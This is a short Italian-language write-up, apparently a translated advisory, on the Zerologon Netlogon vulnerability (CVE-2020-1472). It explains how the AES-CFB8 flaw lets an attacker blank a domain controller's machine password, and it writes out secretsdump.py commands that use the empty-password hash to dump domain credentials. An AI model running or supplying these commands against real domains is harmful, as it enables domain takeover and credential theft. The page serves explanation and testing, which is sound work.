
[CVE-2020-1472] Escalation dei privilegi nella chiamata al protocollo remoto Netlogon (MS-NRPC) (Zerologon)
[CVE-2020-1472] Escalation di privilegi della chiamata al protocollo remoto Netlogon (MS-NRPC) (Zerologon)
L'attacco descritto qui sfrutta i difetti di un protocollo di autenticazione crittografica (uso insicuro di AES-CFB8) che dimostra al Domain Controller (DC) l'autenticità e l'identità di un computer aggiunto al dominio. A causa dell'uso errato di una modalità operativa AES, è possibile falsificare l'identità di qualsiasi account computer (incluso quello dello stesso DC) e impostare una password vuota (semplicemente inviando una serie di messaggi Netlogon in cui vari campi sono riempiti con zeri) per quell'account nel dominio. Questo può poi essere utilizzato per ottenere le credenziali di amministratore di dominio e quindi ripristinare la password originale del DC.
Per verificare CVE-2020-1472
Per sfruttare CVE-2020-1472
Quindi, esegui uno dei seguenti comandi
Formato di esempio 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Formato di esempio 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Il post originale del blog è disponibile qui
Il repository originale che include lo script di test Python è disponibile qui
Il repository originale che include lo script di exploit Python è disponibile qui